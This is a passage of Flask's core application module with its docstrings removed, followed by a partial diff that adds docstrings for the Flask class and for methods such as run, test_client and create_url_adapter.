(param.annotation is inspect.Parameter.empty and param.name == "ctx")
or (
# string annotation, access path ends with AppContext
isinstance(param.annotation, str)
and param.annotation.rpartition(".")[2] == "AppContext"
)
or (
# class annotation
inspect.isclass(param.annotation)
and issubclass(param.annotation, AppContext)
)
):
warnings.warn(
f"The '{method.__name__}' method now takes 'ctx: AppContext'"
" as the first parameter. The old signature is deprecated"
" and will not be supported in Flask 4.0.",
DeprecationWarning,
stacklevel=2,
)
setattr(cls, method.__name__, remove_ctx(method))
setattr(Flask, method.__name__, add_ctx(base_method))
def __init__(
self,
import_name: str,
static_url_path: str | None = None,
static_folder: str | os.PathLike[str] | None = "static",
static_host: str | None = None,
host_matching: bool = False,
subdomain_matching: bool = False,
template_folder: str | os.PathLike[str] | None = "templates",
instance_path: str | None = None,
instance_relative_config: bool = False,
root_path: str | None = None,
):
super().__init__(
import_name=import_name,
static_url_path=static_url_path,
static_folder=static_folder,
static_host=static_host,
host_matching=host_matching,
subdomain_matching=subdomain_matching,
template_folder=template_folder,
instance_path=instance_path,
instance_relative_config=instance_relative_config,
root_path=root_path,
)
#: The Click command group for registering CLI commands for this
#: object. The commands are available from the ``flask`` command
#: once the application has been discovered and blueprints have
#: been registered.
self.cli = cli.AppGroup()
# Set the name of the Click group in case someone wants to add
# the app's commands to another CLI tool.
self.cli.name = self.name
# Add a static route using the provided static_url_path, static_host,
# and static_folder if there is a configured static_folder.
# Note we do this without checking if static_folder exists.
# For one, it might be created while the server is running (e.g. during
# development). Also, Google App Engine stores static files somewhere
if self.has_static_folder:
assert bool(static_host) == host_matching, (
"Invalid static_host/host_matching combination"
)
# Use a weakref to avoid creating a reference cycle between the app
# and the view function (see #3761).
self_ref = weakref.ref(self)
self.add_url_rule(
f"{self.static_url_path}/<path:filename>",
endpoint="static",
host=static_host,
view_func=lambda **kw: self_ref().send_static_file(**kw), # type: ignore
)
def get_send_file_max_age(self, filename: str | None) -> int | None:
value = self.config["SEND_FILE_MAX_AGE_DEFAULT"]
if value is None:
return None
if isinstance(value, timedelta):
return int(value.total_seconds())
return value # type: ignore[no-any-return]
def send_static_file(self, filename: str) -> Response:
if not self.has_static_folder:
raise RuntimeError("'static_folder' must be set to serve static_files.")
# send_file only knows to call get_send_file_max_age on the app,
# call it here so it works for blueprints too.
max_age = self.get_send_file_max_age(filename)
return send_from_directory(
t.cast(str, self.static_folder), filename, max_age=max_age
)
def open_resource(
self, resource: str, mode: str = "rb", encoding: str | None = None
) -> t.IO[t.AnyStr]:
if mode not in {"r", "rt", "rb"}:
raise ValueError("Resources can only be opened for reading.")
path = os.path.join(self.root_path, resource)
if mode == "rb":
return open(path, mode) # pyright: ignore
return open(path, mode, encoding=encoding)
def open_instance_resource(
self, resource: str, mode: str = "rb", encoding: str | None = "utf-8"
) -> t.IO[t.AnyStr]:
path = os.path.join(self.instance_path, resource)
if "b" in mode:
return open(path, mode)
return open(path, mode, encoding=encoding)
def create_jinja_environment(self) -> Environment:
options = dict(self.jinja_options)
if "autoescape" not in options:
options["autoescape"] = self.select_jinja_autoescape
if "auto_reload" not in options:
auto_reload = self.config["TEMPLATES_AUTO_RELOAD"]
if auto_reload is None:
auto_reload = self.debug
options["auto_reload"] = auto_reload
rv = self.jinja_environment(self, **options)
rv.globals.update(
url_for=self.url_for,
get_flashed_messages=get_flashed_messages,
config=self.config,
# request, session and g are normally added with the
# context processor for efficiency reasons but for imported
# templates we also want the proxies in there.
request=request,
session=session,
g=g,
)
rv.policies["json.dumps_function"] = self.json.dumps
return rv
def create_url_adapter(self, request: Request | None) -> MapAdapter | None:
if request is not None:
if (trusted_hosts := self.config["TRUSTED_HOSTS"]) is not None:
request.trusted_hosts = trusted_hosts
# Check trusted_hosts here until bind_to_environ does.
request.host = get_host(request.environ, request.trusted_hosts) # pyright: ignore
subdomain = None
server_name = self.config["SERVER_NAME"]
if self.url_map.host_matching:
# Don't pass SERVER_NAME, otherwise it's used and the actual
# host is ignored, which breaks host matching.
server_name = None
elif not self.subdomain_matching:
# Werkzeug doesn't implement subdomain matching yet. Until then,
# disable it by forcing the current subdomain to the default, or
# the empty string.
subdomain = self.url_map.default_subdomain or ""
return self.url_map.bind_to_environ(
request.environ, server_name=server_name, subdomain=subdomain
)
# Need at least SERVER_NAME to match/build outside a request.
if self.config["SERVER_NAME"] is not None:
return self.url_map.bind(
self.config["SERVER_NAME"],
script_name=self.config["APPLICATION_ROOT"],
url_scheme=self.config["PREFERRED_URL_SCHEME"],
)
return None
def raise_routing_exception(self, request: Request) -> t.NoReturn:
if (
not self.debug
or not isinstance(request.routing_exception, RequestRedirect)
or request.routing_exception.code in {307, 308}
or request.method in {"GET", "HEAD", "OPTIONS"}
):
raise request.routing_exception # type: ignore[misc]
from .debughelpers import FormDataRoutingRedirect
raise FormDataRoutingRedirect(request)
def update_template_context(
self, ctx: AppContext, context: dict[str, t.Any]
) -> None:
names: t.Iterable[str | None] = (None,)
# A template may be rendered outside a request context.
if ctx.has_request:
names = chain(names, reversed(ctx.request.blueprints))
# The values passed to render_template take precedence. Keep a
# copy to re-apply after all context functions.
orig_ctx = context.copy()
for name in names:
if name in self.template_context_processors:
for func in self.template_context_processors[name]:
context.update(self.ensure_sync(func)())
context.update(orig_ctx)
def make_shell_context(self) -> dict[str, t.Any]:
rv = {"app": self, "g": g}
for processor in self.shell_context_processors:
rv.update(processor())
return rv
def run(
self,
host: str | None = None,
port: int | None = None,
debug: bool | None = None,
load_dotenv: bool = True,
**options: t.Any,
) -> None:
# Ignore this call so that it doesn't start another server if
# the 'flask run' command is used.
if os.environ.get("FLASK_RUN_FROM_CLI") == "true":
if not is_running_from_reloader():
click.secho(
" * Ignoring a call to 'app.run()' that would block"
" the current 'flask' CLI command.\n"
" Only call 'app.run()' in an 'if __name__ =="
' "__main__"\' guard.',
fg="red",
)
return
if get_load_dotenv(load_dotenv):
cli.load_dotenv()
# if set, env var overrides existing value
if "FLASK_DEBUG" in os.environ:
self.debug = get_debug_flag()
# debug passed to method overrides all other sources
if debug is not None:
self.debug = bool(debug)
server_name = self.config.get("SERVER_NAME")
sn_host = sn_port = None
if server_name:
sn_host, _, sn_port = server_name.partition(":")
if not host:
if sn_host:
host = sn_host
else:
host = "127.0.0.1"
if port or port == 0:
port = int(port)
elif sn_port:
port = int(sn_port)
else:
port = 5000
options.setdefault("use_reloader", self.debug)
options.setdefault("use_debugger", self.debug)
options.setdefault("threaded", True)
cli.show_server_banner(self.debug, self.name)
from werkzeug.serving import run_simple
try:
run_simple(t.cast(str, host), port, self, **options)
finally:
# reset the first request information if the development server
# reset normally. This makes it possible to restart the server
# without reloader and that stuff from an interactive shell.
self._got_first_request = False
def test_client(self, use_cookies: bool = True, **kwargs: t.Any) -> FlaskClient:
cls = self.test_client_class
if cls is None:
from .testing import FlaskClient as cls
return cls( # type: ignore
self, self.response_class, use_cookies=use_cookies, **kwargs
)
def test_cli_runner(self, **kwargs: t.Any) -> FlaskCliRunner:
cls = self.test_cli_runner_class
if cls is None:
from .testing import FlaskCliRunner as cls
return cls(self, **kwargs) # type: ignore
def handle_http_exception(
self, ctx: AppContext, e: HTTPException
) -> HTTPException | ft.ResponseReturnValue:
# Proxy exceptions don't have error codes. We want to always return
# those unchanged as errors
if e.code is None:
return e
# RoutingExceptions are used internally to trigger routing
# actions, such as slash redirects raising RequestRedirect. They
# are not raised or handled in user code.
if isinstance(e, RoutingException):
return e
handler = self._find_error_handler(e, ctx.request.blueprints)
if handler is None:
return e
return self.ensure_sync(handler)(e) # type: ignore[no-any-return]
def handle_user_exception(
self, ctx: AppContext, e: Exception
) -> HTTPException | ft.ResponseReturnValue:
if isinstance(e, BadRequestKeyError) and (
self.debug or self.config["TRAP_BAD_REQUEST_ERRORS"]
):
e.show_exception = True
if isinstance(e, HTTPException) and not self.trap_http_exception(e):
return self.handle_http_exception(ctx, e)
handler = self._find_error_handler(e, ctx.request.blueprints)
if handler is None:
raise
return self.ensure_sync(handler)(e) # type: ignore[no-any-return]
def handle_exception(self, ctx: AppContext, e: Exception) -> Response:
exc_info = sys.exc_info()
got_request_exception.send(self, _async_wrapper=self.ensure_sync, exception=e)
propagate = self.config["PROPAGATE_EXCEPTIONS"]
if propagate is None:
propagate = self.testing or self.debug
if propagate:
# Re-raise if called with an active exception, otherwise
# raise the passed in exception.
if exc_info[1] is e:
raise
raise e
self.log_exception(ctx, exc_info)
server_error: InternalServerError | ft.ResponseReturnValue
server_error = InternalServerError(original_exception=e)
handler = self._find_error_handler(server_error, ctx.request.blueprints)
if handler is not None:
server_error = self.ensure_sync(handler)(server_error)
return self.finalize_request(ctx, server_error, from_error_handler=True)
def log_exception(
self,
ctx: AppContext,
exc_info: tuple[type, BaseException, TracebackType] | tuple[None, None, None],
) -> None:
self.logger.error(
f"Exception on {ctx.request.path} [{ctx.request.method}]", exc_info=exc_info
)
def dispatch_request(self, ctx: AppContext) -> ft.ResponseReturnValue:
req = ctx.request
if req.routing_exception is not None:
self.raise_routing_exception(req)
rule: Rule = req.url_rule # type: ignore[assignment]
# if we provide automatic options for this URL and the
# request came with the OPTIONS method, reply automatically
if (
getattr(rule, "provide_automatic_options", False)
and req.method == "OPTIONS"
):
return self.make_default_options_response(ctx)
# otherwise dispatch to the handler for that endpoint
view_args: dict[str, t.Any] = req.view_args # type: ignore[assignment]
return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args) # type: ignore[no-any-return]
def full_dispatch_request(self, ctx: AppContext) -> Response:
if not self._got_first_request and self.should_ignore_error is not None:
import warnings
warnings.warn(
"The 'should_ignore_error' method is deprecated and will"
" be removed in Flask 3.3. Handle errors as needed in"
" teardown handlers instead.",
DeprecationWarning,
stacklevel=1,
)
self._got_first_request = True
try:
request_started.send(self, _async_wrapper=self.ensure_sync)
rv = self.preprocess_request(ctx)
if rv is None:
rv = self.dispatch_request(ctx)
except Exception as e:
rv = self.handle_user_exception(ctx, e)
return self.finalize_request(ctx, rv)
def finalize_request(
self,
ctx: AppContext,
rv: ft.ResponseReturnValue | HTTPException,
from_error_handler: bool = False,
) -> Response:
response = self.make_response(rv)
try:
response = self.process_response(ctx, response)
request_finished.send(
self, _async_wrapper=self.ensure_sync, response=response
)
except Exception:
if not from_error_handler:
raise
self.logger.exception(
"Request finalizing failed with an error while handling an error"
)
return response
def make_default_options_response(self, ctx: AppContext) -> Response:
methods = ctx.url_adapter.allowed_methods() # type: ignore[union-attr]
rv = self.response_class()
rv.allow.update(methods)
return rv
def ensure_sync(self, func: t.Callable[..., t.Any]) -> t.Callable[..., t.Any]:
if iscoroutinefunction(func):
return self.async_to_sync(func)
return func
def async_to_sync(
self, func: t.Callable[..., t.Coroutine[t.Any, t.Any, t.Any]]
) -> t.Callable[..., t.Any]:
try:
from asgiref.sync import async_to_sync as asgiref_async_to_sync
except ImportError:
raise RuntimeError(
"Install Flask with the 'async' extra in order to use async views."
) from None
return asgiref_async_to_sync(func)
def url_for(
self,
/,
endpoint: str,
*,
_anchor: str | None = None,
_method: str | None = None,
_scheme: str | None = None,
_external: bool | None = None,
**values: t.Any,
) -> str:
if (ctx := _cv_app.get(None)) is not None and ctx.has_request:
url_adapter = ctx.url_adapter
blueprint_name = ctx.request.blueprint
# If the endpoint starts with "." and the request matches a
# blueprint, the endpoint is relative to the blueprint.
if endpoint[:1] == ".":
if blueprint_name is not None:
endpoint = f"{blueprint_name}{endpoint}"
else:
endpoint = endpoint[1:]
# When in a request, generate a URL without scheme and
# domain by default, unless a scheme is given.
if _external is None:
_external = _scheme is not None
else:
# If called by helpers.url_for, an app context is active,
# use its url_adapter. Otherwise, app.url_for was called
# directly, build an adapter.
if ctx is not None:
url_adapter = ctx.url_adapter
else:
url_adapter = self.create_url_adapter(None)
if url_adapter is None:
raise RuntimeError(
"Unable to build URLs outside an active request"
" without 'SERVER_NAME' configured. Also configure"
" 'APPLICATION_ROOT' and 'PREFERRED_URL_SCHEME' as"
" needed."
)
# When outside a request, generate a URL with scheme and
# domain by default.
if _external is None:
_external = True
# It is an error to set _scheme when _external=False, in order
# to avoid accidental insecure URLs.
if _scheme is not None and not _external:
raise ValueError("When specifying '_scheme', '_external' must be True.")
self.inject_url_defaults(endpoint, values)
try:
rv = url_adapter.build( # type: ignore[union-attr]
endpoint,
values,
method=_method,
url_scheme=_scheme,
force_external=_external,
)
except BuildError as error:
values.update(
_anchor=_anchor, _method=_method, _scheme=_scheme, _external=_external
)
return self.handle_url_build_error(error, endpoint, values)
if _anchor is not None:
_anchor = _url_quote(_anchor, safe="%!#$&'()*+,/:;=?@")
rv = f"{rv}#{_anchor}"
return rv
def make_response(self, rv: ft.ResponseReturnValue) -> Response:
status: int | None = None
headers: HeadersValue | None = None
# unpack tuple returns
if isinstance(rv, tuple):
len_rv = len(rv)
# a 3-tuple is unpacked directly
if len_rv == 3:
rv, status, headers = rv # type: ignore[misc]
# decide if a 2-tuple has status or headers
elif len_rv == 2:
if isinstance(rv[1], (Headers, dict, tuple, list)):
rv, headers = rv # pyright: ignore
else:
rv, status = rv # type: ignore[assignment,misc]
# other sized tuples are not allowed
else:
raise TypeError(
"The view function did not return a valid response tuple."
" The tuple must have the form (body, status, headers),"
" (body, status), or (body, headers)."
)
# the body must not be None
if rv is None:
raise TypeError(
f"The view function for {request.endpoint!r} did not"
" return a valid response. The function either returned"
" None or ended without a return statement."
)
# make sure the body is an instance of the response class
if not isinstance(rv, self.response_class):
if isinstance(rv, (str, bytes, bytearray)) or isinstance(rv, cabc.Iterator):
# let the response class set the status and headers instead of
# waiting to do it manually, so that the class can handle any
# special logic
rv = self.response_class(
rv, # pyright: ignore
status=status,
headers=headers, # type: ignore[arg-type]
)
status = headers = None
elif isinstance(rv, (dict, list)):
rv = self.json.response(rv)
elif isinstance(rv, BaseResponse) or callable(rv):
# evaluate a WSGI callable, or coerce a different response
# class to the correct type
try:
rv = self.response_class.force_type(
rv, # type: ignore[arg-type]
request.environ,
)
except TypeError as e:
raise TypeError(
f"{e}\nThe view function did not return a valid"
" response. The return type must be a string,"
" dict, list, tuple with headers or status,"
" Response instance, or WSGI callable, but it"
f" was a {type(rv).__name__}."
).with_traceback(sys.exc_info()[2]) from None
else:
raise TypeError(
"The view function did not return a valid"
" response. The return type must be a string,"
" dict, list, tuple with headers or status,"
" Response instance, or WSGI callable, but it was a"
f" {type(rv).__name__}."
)
rv = t.cast(Response, rv)
# prefer the status if it was provided
if status is not None:
if isinstance(status, (str, bytes, bytearray)):
rv.status = status
else:
rv.status_code = status
# extend existing headers with provided headers
if headers:
rv.headers.update(headers)
return rv
def preprocess_request(self, ctx: AppContext) -> ft.ResponseReturnValue | None:
req = ctx.request
names = (None, *reversed(req.blueprints))
for name in names:
if name in self.url_value_preprocessors:
for url_func in self.url_value_preprocessors[name]:
url_func(req.endpoint, req.view_args)
for name in names:
if name in self.before_request_funcs:
for before_func in self.before_request_funcs[name]:
rv = self.ensure_sync(before_func)()
if rv is not None:
return rv # type: ignore[no-any-return]
return None
def process_response(self, ctx: AppContext, response: Response) -> Response:
for func in ctx._after_request_functions:
response = self.ensure_sync(func)(response)
for name in chain(ctx.request.blueprints, (None,)):
if name in self.after_request_funcs:
for func in reversed(self.after_request_funcs[name]):
response = self.ensure_sync(func)(response)
if not self.session_interface.is_null_session(ctx._get_session()):
self.session_interface.save_session(self, ctx._get_session(), response)
return response
def do_teardown_request(
self, ctx: AppContext, exc: BaseException | None = None
) -> None:
collect_errors = _CollectErrors()
for name in chain(ctx.request.blueprints, (None,)):
if name in self.teardown_request_funcs:
for func in reversed(self.teardown_request_funcs[name]):
with collect_errors:
self.ensure_sync(func)(exc)
with collect_errors:
request_tearing_down.send(self, _async_wrapper=self.ensure_sync, exc=exc)
collect_errors.raise_any("Errors during request teardown")
def do_teardown_appcontext(
self, ctx: AppContext, exc: BaseException | None = None
) -> None:
collect_errors = _CollectErrors()
for func in reversed(self.teardown_appcontext_funcs):
with collect_errors:
self.ensure_sync(func)(exc)
with collect_errors:
appcontext_tearing_down.send(self, _async_wrapper=self.ensure_sync, exc=exc)
collect_errors.raise_any("Errors during app teardown")
def app_context(self) -> AppContext:
return AppContext(self)
def request_context(self, environ: WSGIEnvironment) -> AppContext:
return AppContext.from_environ(self, environ)
def test_request_context(self, *args: t.Any, **kwargs: t.Any) -> AppContext:
from .testing import EnvironBuilder
builder = EnvironBuilder(self, *args, **kwargs)
try:
environ = builder.get_environ()
finally:
builder.close()
return self.request_context(environ)
def wsgi_app(
self, environ: WSGIEnvironment, start_response: StartResponse
) -> cabc.Iterable[bytes]:
ctx = self.request_context(environ)
error: BaseException | None = None
try:
try:
ctx.push()
response = self.full_dispatch_request(ctx)
except Exception as e:
error = e
response = self.handle_exception(ctx, e)
except:
error = sys.exc_info()[1]
raise
return response(environ, start_response)
finally:
if "werkzeug.debug.preserve_context" in environ:
environ["werkzeug.debug.preserve_context"](ctx)
if (
error is not None
and self.should_ignore_error is not None
and self.should_ignore_error(error)
):
error = None
ctx.pop(error)
def __call__(
self, environ: WSGIEnvironment, start_response: StartResponse
) -> cabc.Iterable[bytes]:
return self.wsgi_app(environ, start_response) | --- +++ @@ -107,6 +107,101 @@
class Flask(App):
+ """The flask object implements a WSGI application and acts as the central
+ object. It is passed the name of the module or package of the
+ application. Once it is created it will act as a central registry for
+ the view functions, the URL rules, template configuration and much more.
+
+ The name of the package is used to resolve resources from inside the
+ package or the folder the module is contained in depending on if the
+ package parameter resolves to an actual python package (a folder with
+ an :file:`__init__.py` file inside) or a standard module (just a ``.py`` file).
+
+ For more information about resource loading, see :func:`open_resource`.
+
+ Usually you create a :class:`Flask` instance in your main module or
+ in the :file:`__init__.py` file of your package like this::
+
+ from flask import Flask
+ app = Flask(__name__)
+
+ .. admonition:: About the First Parameter
+
+ The idea of the first parameter is to give Flask an idea of what
+ belongs to your application. This name is used to find resources
+ on the filesystem, can be used by extensions to improve debugging
+ information and a lot more.
+
+ So it's important what you provide there. If you are using a single
+ module, `__name__` is always the correct value. If you however are
+ using a package, it's usually recommended to hardcode the name of
+ your package there.
+
+ For example if your application is defined in :file:`yourapplication/app.py`
+ you should create it with one of the two versions below::
+
+ app = Flask('yourapplication')
+ app = Flask(__name__.split('.')[0])
+
+ Why is that? The application will work even with `__name__`, thanks
+ to how resources are looked up. However it will make debugging more
+ painful. Certain extensions can make assumptions based on the
+ import name of your application. For example the Flask-SQLAlchemy
+ extension will look for the code in your application that triggered
+ an SQL query in debug mode. If the import name is not properly set
+ up, that debugging information is lost. (For example it would only
+ pick up SQL queries in `yourapplication.app` and not
+ `yourapplication.views.frontend`)
+
+ .. versionadded:: 0.7
+ The `static_url_path`, `static_folder`, and `template_folder`
+ parameters were added.
+
+ .. versionadded:: 0.8
+ The `instance_path` and `instance_relative_config` parameters were
+ added.
+
+ .. versionadded:: 0.11
+ The `root_path` parameter was added.
+
+ .. versionadded:: 1.0
+ The ``host_matching`` and ``static_host`` parameters were added.
+
+ .. versionadded:: 1.0
+ The ``subdomain_matching`` parameter was added. Subdomain
+ matching needs to be enabled manually now. Setting
+ :data:`SERVER_NAME` does not implicitly enable it.
+
+ :param import_name: the name of the application package
+ :param static_url_path: can be used to specify a different path for the
+ static files on the web. Defaults to the name
+ of the `static_folder` folder.
+ :param static_folder: The folder with static files that is served at
+ ``static_url_path``. Relative to the application ``root_path``
+ or an absolute path. Defaults to ``'static'``.
+ :param static_host: the host to use when adding the static route.
+ Defaults to None. Required when using ``host_matching=True``
+ with a ``static_folder`` configured.
+ :param host_matching: set ``url_map.host_matching`` attribute.
+ Defaults to False.
+ :param subdomain_matching: consider the subdomain relative to
+ :data:`SERVER_NAME` when matching routes. Defaults to False.
+ :param template_folder: the folder that contains the templates that should
+ be used by the application. Defaults to
+ ``'templates'`` folder in the root path of the
+ application.
+ :param instance_path: An alternative instance path for the application.
+ By default the folder ``'instance'`` next to the
+ package or module is assumed to be the instance
+ path.
+ :param instance_relative_config: if set to ``True`` relative filenames
+ for loading the config are assumed to
+ be relative to the instance path instead
+ of the application root.
+ :param root_path: The path to the root of the application files.
+ This should only be set manually when it can't be detected
+ automatically, such as for namespace packages.
+ """
default_config = ImmutableDict(
{
@@ -268,6 +363,22 @@ )
def get_send_file_max_age(self, filename: str | None) -> int | None:
+ """Used by :func:`send_file` to determine the ``max_age`` cache
+ value for a given file path if it wasn't passed.
+
+ By default, this returns :data:`SEND_FILE_MAX_AGE_DEFAULT` from
+ the configuration of :data:`~flask.current_app`. This defaults
+ to ``None``, which tells the browser to use conditional requests
+ instead of a timed cache, which is usually preferable.
+
+ Note this is a duplicate of the same method in the Flask
+ class.
+
+ .. versionchanged:: 2.0
+ The default configuration is ``None`` instead of 12 hours.
+
+ .. versionadded:: 0.9
+ """
value = self.config["SEND_FILE_MAX_AGE_DEFAULT"]
if value is None:
@@ -279,6 +390,17 @@ return value # type: ignore[no-any-return]
def send_static_file(self, filename: str) -> Response:
+ """The view function used to serve files from
+ :attr:`static_folder`. A route is automatically registered for
+ this view at :attr:`static_url_path` if :attr:`static_folder` is
+ set.
+
+ Note this is a duplicate of the same method in the Flask
+ class.
+
+ .. versionadded:: 0.5
+
+ """
if not self.has_static_folder:
raise RuntimeError("'static_folder' must be set to serve static_files.")
@@ -292,6 +414,26 @@ def open_resource(
self, resource: str, mode: str = "rb", encoding: str | None = None
) -> t.IO[t.AnyStr]:
+ """Open a resource file relative to :attr:`root_path` for reading.
+
+ For example, if the file ``schema.sql`` is next to the file
+ ``app.py`` where the ``Flask`` app is defined, it can be opened
+ with:
+
+ .. code-block:: python
+
+ with app.open_resource("schema.sql") as f:
+ conn.executescript(f.read())
+
+ :param resource: Path to the resource relative to :attr:`root_path`.
+ :param mode: Open the file in this mode. Only reading is supported,
+ valid values are ``"r"`` (or ``"rt"``) and ``"rb"``.
+ :param encoding: Open the file with this encoding when opening in text
+ mode. This is ignored when opening in binary mode.
+
+ .. versionchanged:: 3.1
+ Added the ``encoding`` parameter.
+ """
if mode not in {"r", "rt", "rb"}:
raise ValueError("Resources can only be opened for reading.")
@@ -305,6 +447,18 @@ def open_instance_resource(
self, resource: str, mode: str = "rb", encoding: str | None = "utf-8"
) -> t.IO[t.AnyStr]:
+ """Open a resource file relative to the application's instance folder
+ :attr:`instance_path`. Unlike :meth:`open_resource`, files in the
+ instance folder can be opened for writing.
+
+ :param resource: Path to the resource relative to :attr:`instance_path`.
+ :param mode: Open the file in this mode.
+ :param encoding: Open the file with this encoding when opening in text
+ mode. This is ignored when opening in binary mode.
+
+ .. versionchanged:: 3.1
+ Added the ``encoding`` parameter.
+ """
path = os.path.join(self.instance_path, resource)
if "b" in mode:
@@ -313,6 +467,17 @@ return open(path, mode, encoding=encoding)
def create_jinja_environment(self) -> Environment:
+ """Create the Jinja environment based on :attr:`jinja_options`
+ and the various Jinja-related methods of the app. Changing
+ :attr:`jinja_options` after this will have no effect. Also adds
+ Flask-related globals and filters to the environment.
+
+ .. versionchanged:: 0.11
+ ``Environment.auto_reload`` set in accordance with
+ ``TEMPLATES_AUTO_RELOAD`` configuration option.
+
+ .. versionadded:: 0.5
+ """
options = dict(self.jinja_options)
if "autoescape" not in options:
@@ -342,6 +507,25 @@ return rv
def create_url_adapter(self, request: Request | None) -> MapAdapter | None:
+ """Creates a URL adapter for the given request. The URL adapter
+ is created at a point where the request context is not yet set
+ up so the request is passed explicitly.
+
+ .. versionchanged:: 3.1
+ If :data:`SERVER_NAME` is set, it does not restrict requests to
+ only that domain, for both ``subdomain_matching`` and
+ ``host_matching``.
+
+ .. versionchanged:: 1.0
+ :data:`SERVER_NAME` no longer implicitly enables subdomain
+ matching. Use :attr:`subdomain_matching` instead.
+
+ .. versionchanged:: 0.9
+ This can be called outside a request when the URL adapter is created
+ for an application context.
+
+ .. versionadded:: 0.6
+ """
if request is not None:
if (trusted_hosts := self.config["TRUSTED_HOSTS"]) is not None:
request.trusted_hosts = trusted_hosts
@@ -376,6 +560,21 @@ return None
def raise_routing_exception(self, request: Request) -> t.NoReturn:
+ """Intercept routing exceptions and possibly do something else.
+
+ In debug mode, intercept a routing redirect and replace it with
+ an error if the body will be discarded.
+
+ With modern Werkzeug this shouldn't occur, since it now uses a
+ 308 status which tells the browser to resend the method and
+ body.
+
+ .. versionchanged:: 2.1
+ Don't intercept 307 and 308 redirects.
+
+ :meta private:
+ :internal:
+ """
if (
not self.debug
or not isinstance(request.routing_exception, RequestRedirect)
@@ -391,6 +590,16 @@ def update_template_context(
self, ctx: AppContext, context: dict[str, t.Any]
) -> None:
+ """Update the template context with some commonly used variables.
+ This injects request, session, config and g into the template
+ context as well as everything template context processors want
+ to inject. Note that the as of Flask 0.6, the original values
+ in the context will not be overridden if a context processor
+ decides to return a value with the same key.
+
+ :param context: the context as a dictionary that is updated in place
+ to add extra variables.
+ """
names: t.Iterable[str | None] = (None,)
# A template may be rendered outside a request context.
@@ -409,6 +618,12 @@ context.update(orig_ctx)
def make_shell_context(self) -> dict[str, t.Any]:
+ """Returns the shell context for an interactive shell for this
+ application. This runs all the registered shell context
+ processors.
+
+ .. versionadded:: 0.11
+ """
rv = {"app": self, "g": g}
for processor in self.shell_context_processors:
rv.update(processor())
@@ -422,6 +637,61 @@ load_dotenv: bool = True,
**options: t.Any,
) -> None:
+ """Runs the application on a local development server.
+
+ Do not use ``run()`` in a production setting. It is not intended to
+ meet security and performance requirements for a production server.
+ Instead, see :doc:`/deploying/index` for WSGI server recommendations.
+
+ If the :attr:`debug` flag is set the server will automatically reload
+ for code changes and show a debugger in case an exception happened.
+
+ If you want to run the application in debug mode, but disable the
+ code execution on the interactive debugger, you can pass
+ ``use_evalex=False`` as parameter. This will keep the debugger's
+ traceback screen active, but disable code execution.
+
+ It is not recommended to use this function for development with
+ automatic reloading as this is badly supported. Instead you should
+ be using the :command:`flask` command line script's ``run`` support.
+
+ .. admonition:: Keep in Mind
+
+ Flask will suppress any server error with a generic error page
+ unless it is in debug mode. As such to enable just the
+ interactive debugger without the code reloading, you have to
+ invoke :meth:`run` with ``debug=True`` and ``use_reloader=False``.
+ Setting ``use_debugger`` to ``True`` without being in debug mode
+ won't catch any exceptions because there won't be any to
+ catch.
+
+ :param host: the hostname to listen on. Set this to ``'0.0.0.0'`` to
+ have the server available externally as well. Defaults to
+ ``'127.0.0.1'`` or the host in the ``SERVER_NAME`` config variable
+ if present.
+ :param port: the port of the webserver. Defaults to ``5000`` or the
+ port defined in the ``SERVER_NAME`` config variable if present.
+ :param debug: if given, enable or disable debug mode. See
+ :attr:`debug`.
+ :param load_dotenv: Load the nearest :file:`.env` and :file:`.flaskenv`
+ files to set environment variables. Will also change the working
+ directory to the directory containing the first file found.
+ :param options: the options to be forwarded to the underlying Werkzeug
+ server. See :func:`werkzeug.serving.run_simple` for more
+ information.
+
+ .. versionchanged:: 1.0
+ If installed, python-dotenv will be used to load environment
+ variables from :file:`.env` and :file:`.flaskenv` files.
+
+ The :envvar:`FLASK_DEBUG` environment variable will override :attr:`debug`.
+
+ Threaded mode is enabled by default.
+
+ .. versionchanged:: 0.10
+ The default port is now picked from the ``SERVER_NAME``
+ variable.
+ """
# Ignore this call so that it doesn't start another server if
# the 'flask run' command is used.
if os.environ.get("FLASK_RUN_FROM_CLI") == "true":
@@ -483,6 +753,56 @@ self._got_first_request = False
def test_client(self, use_cookies: bool = True, **kwargs: t.Any) -> FlaskClient:
+ """Creates a test client for this application. For information
+ about unit testing head over to :doc:`/testing`.
+
+ Note that if you are testing for assertions or exceptions in your
+ application code, you must set ``app.testing = True`` in order for the
+ exceptions to propagate to the test client. Otherwise, the exception
+ will be handled by the application (not visible to the test client) and
+ the only indication of an AssertionError or other exception will be a
+ 500 status code response to the test client. See the :attr:`testing`
+ attribute. For example::
+
+ app.testing = True
+ client = app.test_client()
+
+ The test client can be used in a ``with`` block to defer the closing down
+ of the context until the end of the ``with`` block. This is useful if
+ you want to access the context locals for testing::
+
+ with app.test_client() as c:
+ rv = c.get('/?vodka=42')
+ assert request.args['vodka'] == '42'
+
+ Additionally, you may pass optional keyword arguments that will then
+ be passed to the application's :attr:`test_client_class` constructor.
+ For example::
+
+ from flask.testing import FlaskClient
+
+ class CustomClient(FlaskClient):
+ def __init__(self, *args, **kwargs):
+ self._authentication = kwargs.pop("authentication")
+ super(CustomClient,self).__init__( *args, **kwargs)
+
+ app.test_client_class = CustomClient
+ client = app.test_client(authentication='Basic ....')
+
+ See :class:`~flask.testing.FlaskClient` for more information.
+
+ .. versionchanged:: 0.4
+ added support for ``with`` block usage for the client.
+
+ .. versionadded:: 0.7
+ The `use_cookies` parameter was added as well as the ability
+ to override the client to be used by setting the
+ :attr:`test_client_class` attribute.
+
+ .. versionchanged:: 0.11
+ Added `**kwargs` to support passing additional keyword arguments to
+ the constructor of :attr:`test_client_class`.
+ """
cls = self.test_client_class
if cls is None:
from .testing import FlaskClient as cls
@@ -491,6 +811,15 @@ )
def test_cli_runner(self, **kwargs: t.Any) -> FlaskCliRunner:
+ """Create a CLI runner for testing CLI commands.
+ See :ref:`testing-cli`.
+
+ Returns an instance of :attr:`test_cli_runner_class`, by default
+ :class:`~flask.testing.FlaskCliRunner`. The Flask app object is
+ passed as the first argument.
+
+ .. versionadded:: 1.0
+ """
cls = self.test_cli_runner_class
if cls is None:
@@ -501,6 +830,22 @@ def handle_http_exception(
self, ctx: AppContext, e: HTTPException
) -> HTTPException | ft.ResponseReturnValue:
+ """Handles an HTTP exception. By default this will invoke the
+ registered error handlers and fall back to returning the
+ exception as response.
+
+ .. versionchanged:: 1.0.3
+ ``RoutingException``, used internally for actions such as
+ slash redirects during routing, is not passed to error
+ handlers.
+
+ .. versionchanged:: 1.0
+ Exceptions are looked up by code *and* by MRO, so
